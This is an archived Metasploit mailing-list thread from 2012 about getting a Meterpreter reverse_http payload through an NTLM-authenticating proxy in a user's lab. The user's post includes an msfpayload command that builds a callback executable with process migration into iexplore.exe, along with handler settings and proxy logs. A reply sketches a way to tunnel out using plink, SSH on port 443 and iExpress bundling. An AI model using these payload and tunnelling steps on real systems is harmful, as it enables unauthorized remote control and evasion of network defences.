Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Re: meterpreter ntlm proxy bypass

From: Sherif El-Deeb <archeldeeb () gmail com>
Date: Fri, 13 Apr 2012 23:29:16 +0300
When using a proxy with NTLM auth, every HTTP request will get 407'ed
first "i.e. denied access till further challenge-response action will
take place to make sure you have the correct creds", after
successfully finishing the challenge-response thing, *ANOTHER
IDENTICAL* http request will be sent but will go through this time "if
I'm wrong someone correct me".

Given this brief introduction, as far as I can remember reverse_http
does this using the WinInet API, which means it will take place
transparently and if the user can browse the internet
_without_being_asked_for_credentials_ , then reverse_http SHOULD be
able to connect back to the multi/handler even through the proxy
without a problem.

I am not a native English speaker myself and I always have problems
trying to let other people understand what I am trying to say...and I
got a feeling that you might be having the same issue :)

Please speak the universal language and attach the PCAP from the
client and handler sides, if that's fine, so we may help you better
solve your problem.

Sherif Eldeeb

On Fri, Apr 13, 2012 at 9:58 PM, audio audience <audience099 () gmail com> wrote:

Thanks for answer.

First of all, is meterpreter can access basic authentication proxy ?

Then, I changed my network labs.
I setup a MS TMG server and enabled integrated auth. If computer is joined
active directory, it's can access  to internet over TMG.

I ran meterpreter reverse_http payload, meterpreter automatical connect to
proxy ip and port and get http request but it's doesn't complete NTLM auth.
and TMG blocked this request.

I saw the meterpreter traffic via wireshark, MS TMG is blocked meterpreter's
http traffic;
GET http://x.y.z.t/8YyR HTTP/1.0
Host: x.y.z.t
Pragma: no-cache

HTTP/1.1 407 Proxy Authentication Required ( Forefront TMG requires
authorization to fulfill the request. Access to the Web Proxy filter is
denied.  )
Via: 1.1 WIN-1ADVF
Proxy-Authenticate: Negotiate
Proxy-Authenticate: Kerberos
Proxy-Authenticate: NTLM
Proxy-Authenticate: Digest
qop="auth",algorithm=MD5-sess,nonce="+Upgraded+xh2sa123da14de32b881d8f64c125075a269ad11f1acd019f21333a41c0025df240d348959c41028a80443ef67b52380888306094e49f99",charset=utf-8,realm="xyz.com"
Connection: Keep-Alive
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 4128

Are you have any idea for this subject ...

2012/4/11 Sherif El-Deeb <archeldeeb () gmail com>


If the logged in user already is a member of the domain, is allowed
internet access and the machine is joined to the domain, then
reverse_http SHOULD go through the system configured proxy even with
NTLM auth, no problem (thanks HD & Mubix!) ... (if you meet that
criteria already try setting the LPORT at the mutli/handler to 80
since that might be the only port allowed).

however, if the logged in user is not allowed internet connection, or
the machine is not member of the domain (i.e. everythime you connect
to the internet it pops-up asking for creds) you have to have the
following:

1- You have to know the username,  password and  domain of an
allowed-internet user.
2- the Proxy IP and port
3- you have to bundle "meterpreter" with a "NTLM-Auth-proxy-aware"
program to tunnel through the connection for you, a
tested-and-guaranteed example would be (SSH server listening on 443) +
(PLINK with the -L switch) + (meterpreter with LHOST set to 127.0.0.1)
+ (some command-line kung-fu to add the host SSH key and glue
everything together) + iExpress.

As far as I know, there's nothing built-in that allows you to specify
a username, pass, domain and the proxy:port to meterpreter :)

I think I'll write a blog post about this someday :) but please beware
that you have to know lots of things in advance to make this work.

Sherif Eldeeb

On Wed, Apr 11, 2012 at 10:49 PM, audio audience <audience099 () gmail com>
wrote:

Hello Everyone,

I want to bypass ntlm supported proxy bypass with meterpreter.
I tested it in my Labs; all outgoing traffics blocked by firewall for
client. If client want to access internet, it's need to set windows
username
and password to ntlm auth. proxy.

I created meterpreter payload this following options;
# msfpayload windows/meterpreter/reverse_http LHOST=x.y.z.t LPORT=8080
AutoRunScript='migrate2 iexplore.exe' X > /var/www/8.exe

For listening mode;
msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_http):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread,
process, none
   LHOST     x.y.z.t    yes       The local listener hostname
   LPORT     8080             yes       The local listener port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > exploit

[*] Started HTTP reverse handler on http://x.y.z.t:8080/
[*] Starting the payload handler...


And then i ran 8.exe to victim computer but proxy is blocked meterpreter
http connection, because meterpreter didn't complate ntlm auth.
Squid Log;
1334171617.857      0 a.b.c.d TCP_DENIED/407 1744 GET
http://x.y.z.t:8080/l2eY - NONE/- text/html

How i can bypass ntlm auth. with meterpreter payload.

Thanks for supports

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework





_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: